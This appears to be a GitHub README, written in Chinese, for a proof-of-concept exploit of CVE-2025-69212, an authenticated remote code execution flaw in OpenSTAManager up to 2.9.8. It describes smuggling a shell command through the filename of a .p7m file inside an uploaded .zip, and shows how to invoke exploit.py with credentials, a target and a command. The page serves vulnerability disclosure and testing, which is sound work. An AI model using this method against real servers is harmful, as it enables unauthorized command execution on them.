m2sousa/CVE-2025-69212

GitHub: m2sousa/CVE-2025-69212

针对 OpenSTAManager ≤2.9.8 已认证远程代码执行漏洞(CVE-2025-69212)的概念验证工具。

Stars: 0 | Forks: 0

# CVE-2025-69212 ## 描述 OpenSTAManager 是一款用于技术支持、电子发票和会计管理的软件解决方案。版本 `<=2.9.8` 存在一个经过认证的远程代码执行漏洞。攻击者可以通过上传一个特制的 `.zip` 压缩包来利用此问题,该压缩包包含一个 `.p7m` 文件,其文件名会被解析为 shell 命令,从而导致在远程服务器上执行任意命令。 ## 用法 ### 环境要求 ``` $ pip install requests ``` ### 漏洞验证程序(PoC)用法 ``` $ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD] ``` 示例: ``` $ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id" ``` ### 选项 ``` -h, --help show this help message and exit --user USER username for auth. --password PASSWORD password for auth. --target TARGET target domain endpoint --cmd CMD command to execute on the server ``` ## 参考 - [nvd.nist.gov/vuln/detail/CVE-2025-69212](nvd.nist.gov/vuln/detail/CVE-2025-69212) - [github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36](github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36)
标签:CISA项目, PoC, Python, RCE利用, 安全漏洞, 无后门, 暴力破解, 逆向工具